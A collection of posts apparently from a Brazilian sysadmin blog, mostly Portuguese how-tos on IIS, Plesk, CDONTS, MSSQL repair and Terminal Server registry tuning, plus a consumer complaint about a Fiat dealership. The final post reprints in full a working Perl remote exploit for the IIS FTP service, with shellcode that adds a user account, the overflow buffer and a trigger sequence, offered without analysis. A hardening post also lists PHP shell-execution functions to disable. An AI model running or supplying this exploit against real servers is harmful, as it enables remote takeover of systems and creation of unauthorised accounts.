How to Solve unexpectedly Error 500 (Timeout) PHP + FastCGI + IIS 7 (Windows 7/8/10/2008/2012 server)

Standard

I could found some links that could help you. The problem is the activityTimeout of your cgi module.

For my, works in summary this.

Open the dos console “cmd” and go to c:\windows\system32\inetsrv\ then, execute this command, changing the path of your php-cgiappcmd set config -section:system.webServer/fastCgi "-[fullPath='C:\php\php-cgi.exe'].activityTimeout:3600"

FIAT + FIORI – UMA PARCERIA DE BABACAS FOREVER ALONE

Standard

A concessionária Fiori, revendedora da linha Fiat em João Pessoa, comercializou em dezembro de 2011 um veículo ‘Novo Palio’, modelo 2012, de placas OFB-7139-PB, com falhas ao cliente José Fernando Santos de Carvalho.

De acordo com o comprador, dois dias após a aquisição do veículo, começaram os intermináveis problemas. Inicialmente, o veículo não deu partida, ou seja, quando a chave de ignição era acionada, o painel não acendia e o carro não ligava o motor.

Indignação
“Procurei a Fiori para solucionar o problema e ‘eles’ (Fiori) não detectaram nenhuma anomalia, informando que o carro estava em perfeitas condições de uso. No entanto, o problema persistiu e eu retornei diversas vezes na concessionária para relatar a mesma anomalia, além de outros tantos, como um alarme de velocidade excedida sem que o veículo estivesse em tal condição. Houve travamento de porta-malas, ponteiro pulando, computador de bordo todo sem regulagem, entre outros problemas”, disse José Fernando.

Medo
O consumidor prejudicado teme pela sua vida e da sua família. Ele revelou que por conta de sua vida profissional, necessita  viajar constantemente. “Eu não posso nem me arriscar, pois não confio mais no Palio que adquiri na Fiori. Vou procurar meus direitos e tenho fé que tudo será resolvido”, desabafou José Fernando.

O outro lado

A reportagem do Paraíba Já entrou em contato com a Fiori, pelo 3208-1512, porém, a ligação passou por diversos ramais e acabou sendo desligada.

Paraíba Já

 

 

=============

 

http://paraibaja.com.br/?p=noticia_int&id=19509

 

Defeito de fábrica em Novo Palio 2012 e o descaso da FIAT

Nos ultimos 3 meses e meio, tenho retornado à Concessionária Fiat varias vezes. O fato é que comprei um carro(NOVO PALIO 2012) com anomalias, que eles nao conseguem resolver. Eles alegam: “O carro está em perfeitas condicoes de uso”.

Pasmem, ja experimentei porta-malas eletrico travado(no dia que ia viajar para ser padrinho de casamento), computador de bordo informando problemas no motor, dificuldades pra ligar o carro, ponteiro do velocimetro “PULANDO”, cortes na ingestão de combustível enquanto em movimento, controle das portas não respondendo e outras falhas na entrega do produto(direção desalinhada, risco no painel, peças alteradas).

Eu ja não aguento mais relatar o problema a empresa ou ficar vários dias à pés, por deixar o carro na Concessionária. Passo por diversos transtornos e incovenientes.

Tenho um filho de 1 ano. Todo pai sabe que “é lei”, chegar em casa e dar uma voltar na rua com o bebe pra ele nao chorar.Ficar se o unico carro da familia é MUITO PROBLEMATICO.

Faço viagems constantes à refice-PE, devido ao meu mestrado na UFPE e tenho MEDO DA INTEGRIDADE FISICA DA MINHA FAMILIA.

Sugiro que NÃO COMPREM VEICULOS FIAT, É JOGAR DADOS COM A SORTE. se o carro sair bem, ok, senão, vc ESTARÁ NO PREJUIZO (FATO).

 

Fatal error: Call to undefined function curl_init() no plesk 10.4

Standard

No plesk 10.4, quando atualiza-se o mesmo você simplesmente está quase na mão do capiroto!

Sim, o erro vem de cara -> Fatal error: Call to undefined function curl_init()

O que fazer?

 

1 – vá no php.ini que fica em C:\Program Files (x86)\Parallels\Plesk\Additional\PleskPHP5 e tente editar (primeiro localize) a seguinte extensão:

;extension=php_curl.dll — basta somente tirar o ; e depois reiniciar o iis, deve rodar filé.

2 – se ainda ocorrer erro é necessário jogar dlls na pasta syswow64 (para windows 64bt), para isso copie os arquivos libeay32.dll e ssleay32.dll da pasta C:\Program Files (x86)\Parallels\Plesk\Additional\PleskPHP5 e jogue em C:\Windows\Syswow64, depois reinicie o plesk.

 

Ambos procedimentos necessitam de reiniciar todos os serviços do plesk, feito isso, se rolar já me mande uma caixa de BIS! (do preto…)

Instalação do Windows XP ou server 2003 parando em 34 minutos

Standard

Pode parecer curioso, mas se o seu windows XP ou windows server 2003 estiver parando em 34 minutis (instalando dispositivos) vou lhe dizer o nome do “acusado ou acusados”, DISPOSITIVOS USB!

Coloque um teclado PS2 ao invés de um teclado USB, assim como mouse (desconecte impressoras e os demais usb) e corra para o abraço ;).

Client cannot log in. – Home Directory Inccessable

Standard

Se isso acontece com o plesk, verifique se você já fez o seguinte:

1 – Tentou ativar o modo UNIX no ftp.

2 – Verificou se as permissões de pasta no root do ftp estão ok (padrão nas contas de ftp é a pasta httpdocs ou / do vhost do cliente).

3 – Rodou -> “%plesk_bin%\ftpmng.exe” –remove-all “%plesk_bin%\ftpmng.exe” –reconfigure-all

4 – RODOU:

net stop MSFTPSvc
net start MSFTPSvc

5 – Por fim criou o dword HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\InetInfo\Parameters\DisableMemoryCache e deu 1 como valor

SE NÃO rolou nada para o ftp, mesma mensagem de erro? Ainda persiste o erro?

Que tal tentar o FTP para acesso do main ip? LOL, por incrível que pareça as vezes o maion ip precisa ser ajustado como host na conexão de ftp 😉

Error: Unable to update the mail account properties:mailmng failed: Loaded Postoffice Configuration Provider (MEAIPO.DLL) There are no domains for post office: at (MailEnable::MailEnableMailName::MailEnableMailName line 70) at execute console command –add-mailname(vconsoleapp::start line 132) at execute “C:\Program Files (x86)\Parallels\Plesk\/admin/bin/mailmng” –add-mailname –domain-name= (vconsoleapp::run line 143)

Standard

Recebeu o erro acima?

Existem 2 vertentes para sanar seu problema:

 

1 – O seu PLESK é muito recente e não reconhece a versão do seu Mailenable,

2 – Seu Mailenable está precisando ser reintegrado no plesk.

 

Mesmo que você mande o plesk listar os componentes (procedimentos padrão) ele ainda vai dar erro. Qual a saída?

Entre na pasta de admin do plesk e na pasta bin (VIA MS-DOS) e execute:

mchk.exe --all --fix=all
Deve sanar o problema.

Como fazer tunning do Terminal Server na windows server 2003

Standard


Eliminate IE Flickering: Configure this setting to force off-screen composition of Internet Explorer, which eliminates the flickering effect. In HKEY_ CURRENT_USER\Software\Microsoft\Internet Explorer\Main, set the DWORD value for Force Offscreen Composition to 1.

Disable Office 2003 Customer Experience Improvement Program: Configure this setting to prevent Office from prompting the user to participate in this program. To enable, in HKEY_ CURRENT_USER\Software\Microsoft\Office\Common, set the DWORD value for QMEnable to 1.
Disable File Locking: Configure this setting to modify the file locking behavior on the server. This will enhance performance, but it's known to have issues with some database applications. To enable, in HKEY_LOCAL_ MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters, set the DWORD value for UseLockReadUnlock to 1.

Disable NTFS Last-Accessed Time Stamping: Configure this setting to prevent the system from updating the last accessed time stamp on files, which can enhance performance. Some applications require this to be accurate, so test prior to implementing. To enable, in HKEY_LOCAL_ MACHINE\System\CurrentCon trolSet\Control\FileSystem, set the DWORD value for NtfsDisable LastAccessUpdate to 1.
Turn off Lazy Writes: This setting prevents the system from caching write operations before writing them to disk. This can speed operation over the network. Configure the following two keys: In HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Services\ LanmanServer\Parameters, set the DWORD value for IRPStackSize to 15. Also, in HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Services\ LanmanWorkstation\Parameters, set the DWORD value for UtilizeNT Caching to 0.

Improve Windows Kernel Performance: Prevents the system from paging kernel mode drivers and system code to disk, which can decrease performance. To configure: In HKEY_LOCAL_ MACHINE\System\CurrentCon trolSet\Control\Session Manager\ Memory Management, set the DWORD value for DisablePagingExecutive to 1.

Increase the Network Request Buffer: This setting boosts performance by increasing the size of the network request buffer, which determines how much data is stored before it is sent to the client. This setting can also improve LAN Manager file writing performance. Increasing the size of this buffer will consume RAM, so adjust and monitor carefully. To enable, in HKEY_ LOCAL_MACHINE\System\Current ControlSet\Services\LanmanServer\Parameters, increase the DWORD value for SizReqBuf to a value between 1024 and 65535.

Eliminate Session Hangs During Logoff: Terminal Server sessions can sometimes hang when the user attempts to log off. One solution: Modify available network buffers and open connections. Configure the following keys: In HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Services\ LanmanServer\Parameters, set the DWORD value for MaxWorkItems to 8196, MaxMpxCt to 2048, MaxRaw WorkItems to 512, MaxFreeConnections to 100, and MinFreeConnections to 32. In KEY_LOCAL_MACHINE\ System\CurrentControlSet\ Services\LanmanServer\Parameters, set the DWORD value for MaxCmds to 2048. Also, in HKEY_LOCAL_ MACHINE\System\Current ControlSet\Control\SessionManager\ ConfigurationManager, set the value for RegistryLazyFlushInterval to 60. Lastly, ensure that the Enable Advanced Performance feature is enabled when viewing device properties of all disk drives on the system.

Speed up Application Load Times: Increase the perceived performance of your Terminal Server by pre-loading commonly used files into memory. This works well on systems with plenty of available RAM. To enable, in HKEY_ LOCAL_MACHINE\System\ CurrentControlSet\Control\Session Manager\Memory Management\ PrefetchParameters, set the DWORD value for EnablePrefetcher to 3.

Disable Caching of Roaming Profiles: Excess roaming profiles on a Terminal Server can consume disk and Registry quota space. Configuring this setting can eliminate waste but increase user's login time. To enable, in HKEY_ LOCAL_MACHINE\Software\ Microsoft\Windows NT\Current Version\Winlogon, set the DWORD value for DeleteRoamingCache to 1.

Disable Unused Subsystems: Not using the POSIX subsystem on your Terminal Server? Disable it and navigate to the registry location HKEY_LOCAL_ MACHINE\System\CurrentCon trolSet\Control\Session Manager\ Subsystems and delete the Posix key. Disable the File Indexing Service: File Indexing Service is great for quickly searching for files, but your Terminal Server arguably shouldn't have that many user files on it and the indexing process can consume huge system resources. To disable it, navigate to the properties menu of each drive on your system and deselect the box for Allow Indexing Service to index this disk for fast file searching.

O registro do windows deve assemelhar-se com:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\
Main]
"Force Offscreen Composition"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\Common]
"QMEnable"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
LanmanWorkstation\Parameters]
"UseLockReadUnlock"=dword:00000001

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\
FileSystem]
"NtfsDisableLastAccessUpdate"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Lanman Server\Parameters]
"IRPStackSize"=dword:0000000f
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Service\
Lanman WorkStation\Parameters]
"UtilizeNTCaching"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Session Manager\Memory Management]
"DisablePagingExecutive"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
LanmanServer\Parameters]
"SizReqBuf"=dword:0000ffff

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Lanmanserver\Parameters]
"MaxWorkItems"=dword:00002004
"MaxMpxCt"=dword:00000800
"MaxRawWorkItems"=dword:00000200
"MaxFreeConnections"=dword:00000064
"MinFreeConnections"=dword:00000020
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
Lanmanworkstation\Parameters]
"MaxCmds"=dword:00000800
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\
Session Manager\Configuration Manager]
"RegistryLazyFlushInterval"=dword:0000003c

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
SessionManager\Memory Management\PrefetchParameters]
"EnablePrefetcher"="3"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon]
"DeleteRoamingCache"=dword:00000001

http://redmondmag.com/articles/2006/06/01/speed-up-terminal-server.aspx

Cdonts erro 500 quando tento enviar email com ASP classic

Standard

NADA de pânico, reveja antes 2 coisas:

1 – se no log de erros do site aparece 800a0046|Permission_denied no momento do uso do CDONTS,
2 – Reveja todos os passos abaixo (Parallels):

[How-To] Installing CDONTS on Windows 2003 Server
Article ID: 560
Last Review: Sep, 23 2010

Popularity:

APPLIES TO:

* Plesk 8.x for Windows
* Plesk 7.x for Windows
* Plesk 9.x for Windows

Resolution

Microsoft Windows Server 2003 does not install Collaboration Data Objects (CDO) for NTS (CDONTS). Therefore, applications using CDONTS do not work on Windows Server 2003-based computers. Windows Server 2003 provides improved alternatives to CDONTS.

For CDONTS to work in a Windows Server 2003-based computers, please do the following:

1. Download the attached CDONTS.ZIP file (you can also get CDONTS.DLL from the installation CD of your Windows 2000). Once downloaded, unzip CDONTS.DLL and put it in

For 32-bit systems:
%systemroot%\system32 folder (by default C:\Windows\system32).

For 64-bit systems:
%windir%\syswow64 (by default C:\Windows\syswow64).

2. Register the CDONTS.DLL component in the server using the following command:

For 32-bit systems:

regsvr32 “%systemroot%\system32\cdonts.dll”

For example:

C:\WINDOWS\system32>regsvr32.exe cdonts.dll

For 64-bit systems:

regsvr32 “%systemroot%\syswow64\cdonts.dll”

For example:

C:\WINDOWS\syswow64>regsvr32.exe cdonts.dll

3. Once the CDONTS.DLL component is registered, you should check if your SMTP service is running.

Go to Administrative tools, IIS and Expand your local machine. If the SMTP service is listed, it means it is already installed, if not you should install this service.

To install SMTP, do the following:

Go to Control Panel, Add/Remove Programs, Add/Remove Windows Components, Application Server, IIS, Select SMTP service, Click OK.

4. Change the port number for the SMTP service. The default port is 25. Use 25 only when no other SMTP service is running. If there is already another SMTP service running on the server, change the SMTP port of IIS, for example to port 8025.

You can make this through IIS management console: Control Panel, IIS, expand `local computer`, SMTP, Properties, General, click Advanced button, Edit.

5. Set up SMTP service. Most important is setting up a fully qualified domain name for the SMTP service: Control Panel, IIS, expand `local computer`, SMTP, Properties, Delivery, click Advanced button and set up Security service for SMTP.

It is required to give permissions to IIS_WPG standard IIS Worker Process Group. Control Panel, IIS , expand `local computer`, SMTP, Properties, Security, click Add button, then click Object types button…, select Groups element, click OK, enter IIS_WPG as object name to add and click OK.

Additional configuration: Select Authentication and check Anonymous Access and Integrated Windows Authentication. Click OK and then click CONNECTION. Set up the RELAY settings. Click DELIVERY tab and then click ADVANCED. Set up the MAX Count hop to the required value, even though we suggest setting it to at least 20.

Now the SMTP service of IIS is already configured.
Additional information
For additional information, please, refer to

http://support.microsoft.com/default.aspx?scid=kb;en-us;324649
Attachments:

* cdonts.zip(172Kb)

—————————–

Depois de seguir os passos assim, caso você perceba que ainda assim não funciona normal o Cdonts faça algo mais interessante, abra o C:\Inetpub\Mailroot
Nesta pasta dê permissão para IUSR_NOMEDOPC (se o pc fosse nerdblog [hostname] seria iusr_nerdblog).
A permissão deve ser completa para ele.
Depois disso reinicie o IIS e prepare a caixa de BIS para minha casa.

😛

Unable to load object of type Skin with id=8: Skin: unable to select: no such row in the table

Standard

Se você está recebendo a mensagem de erro:

Unable to load object of type Skin with id=8: Skin: unable to select: no such row in the table

Ao tentar logar-se no Parallels Plesk 10.x, nada de Pânico, provavelmente a saída ocorre pois a tabela com a Skin do plesk não foi atualizada corretamente.
Normalmente o id dela fica sendo 1, então se o painel (foi o caso do meu cliente) pedia 8 como id na tabela Skins, para corrigir basta fazer o seguinte:

Abra o MS-DOS e digite:

"%plesk_bin%\dbclient.exe" --direct-sql --sql="update Skins set id=8 where id=1"
Antes dê um select na tabela skins para saber se a Skin Default é realmente de id 1, caso seja diferente basta informar no where o id dela.
Espero a caixa de biz, please!

Error on backups parallels plesk windows Meu windows apresenta erro no parallels plesk no momento do backup

Standard


Este é o erro que está ocorrendo com você?

Error: Runtime error in pmmcli:
(3, ‘GetDiskFreeSpace’, ‘The system cannot find the path specified.’)
Traceback (most recent call last):
File “C:\Program Files\Parallels\Plesk\admin\share\pmmcli\pmmcli.py”, line 1846, in main
data_action_response, errcode_response, error_message = actions.get(sys.argv[1][2:])(parameters)
File “C:\Program Files\Parallels\Plesk\admin\share\pmmcli\pmmcli.py”, line 1721, in make_dump
return ActionRunner(MakeDumpAction, backup_task_description, None).doActivity()
File “C:\Program Files\Parallels\Plesk\admin\share\pmmcli\pmmcli.py”, line 75, in doActivity
result = self.processor.doActivity()
File “C:\Program Files\Parallels\Plesk\admin\share\pmmcli\pmmcli.py”, line 860, in doActivity
if osutil.free_bytes(local_dump_directory) < (long(disk_space_required) * 1048576): File "C:\Program Files\Parallels\Plesk\admin\lib\python\osutil.py", line 188, in free_bytes sectorsPerCluster, bytesPerSector, numFreeClusters, totalNumClusters = GetDiskFreeSpace(os.path.splitdrive(path)[0] + "\\") error: (3, 'GetDiskFreeSpace', 'The system cannot find the path specified.') Se é, antes de tentar seu backup, atualize o plesk para uma versão mais recente e o problema deverá estar sanado.

Warning: odbc_connect() [function.odbc-connect]: SQL error: [Microsoft][ODBC Microsoft Access Driver] Could not use ‘(unknown)’; file already in use., SQL state S1000 in SQLConnect in

Standard

Antemão estou quase chorando por estar usando access, mas como se diz: “Sábio é o que dança conforme a música manda!”.
Estou desenvolvendo ferramentas para automatizar algumas replicações de dados de uma empresa e estou usando php (tecnologia) + access (isso é um banco?)

Este erro é ocasionado pelo fato de existir um drive fechando a conexão (na realidade aberto e acaba bloqueando novas conexões), por exemplo o Access abrindo a bendita base de dados access (.MDB).

Garanta que nada esteja abrindo o access database.

Uma forma de ver que isto está ocorrendo é observar se na pasta aonde o banco de dados esteja, exemplo nerdblog.mdb contenha também um arquivo nerdblog.ldb.

Ao fechar o driver ele automaticamente removerá o arquivo .LDB.

😀

Como reparar um banco de dados MSSQL 2005

Standard


Ao acessar o mssql management studio procure pela aba query (clicando com o botão direito em cima do banco de dados) e insira as seguintes linhas:

EXEC sp_resetstatus ‘nomedobd’;
ALTER DATABASE nomedobd SET EMERGENCY
DBCC checkdb(‘nomedobd’)
ALTER DATABASE nomedobd SET SINGLE_USER WITH ROLLBACK IMMEDIATE
DBCC CheckDB (‘nomedobd’, REPAIR_ALLOW_DATA_LOSS)
ALTER DATABASE nomedobd SET MULTI_USER

Isto deverá corrigir o problema.

Lista de funções para desabilitar em um ambiente CPANEL de Hospedagem de Sites compartilhada

Standard


Bem, se você quer mais segurança em um ambiente compartilhado você precisará de ajustar seu php.ini global (/usr/local/lib/php.ini) em seu servidor de hospedagem compartilhada afim de prevenir ataques usando recursos avançados do php.

Como faremos isto?

Procure pela linha disable_functions =

e depois do ‘=’ aplique as seguintes funções:

dl, system, exec, shell_exec, chown, chgrp, escapeshellcmd, putenv, popen, pclose, passthru, proc_open, proc_get_status, proc_nice, proc_close, proc_terminate, posix_ctermid, posix_get_last_error, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_strerror, posix_times, posix_ttyname, posix_uname

Talvez você precisará do shell_exec para o caso do Fantástico Deluxe.
Avalie se vale a pena deixar esta função ativa e prossiga 😀

Como fazer SEO completo URL-Rewrite no IIS com WordPress?

Standard


Prezados, sou conhecido na comunidade opensource por causa de meus how tos, procuro não omitir informações a ninguém e mais uma vez lá vai uma dica quente:

Se você está sofrendo com o que eu sofri, deixar o worpress sair do basicão do seo no iis, estilo:

site.com.br/index.php/meu-post

Basta seguir os passos abaixo:

1 – baixe o arquivo dll:

http://wp-url-rewriting-on-iis.googlecode.com/files/wp-url-rewriting-2.1-win32.zip
Ou para 64 bt:
http://wp-url-rewriting-on-iis.googlecode.com/files/wp-url-rewriting-2.1-X64.zip
Extraia o arquivo para c:\windows\system32\

2 – Crie um filtro ISAPI dentro do IIS no domínio desejado com o nome:
url-rewrite.
No botão browse procure pelo arquivo wp-url-rewriting.dll dentro da pasta c:\windows\system32\ e selecione-o.

Pronto.

Feito isto o site deverá apresentar o SEO (permalinks) do WordPress de maneira satisfatória.

Abraços.

Exploit para o IIS 6 (FTPD) – BOF

Standard

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl \n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope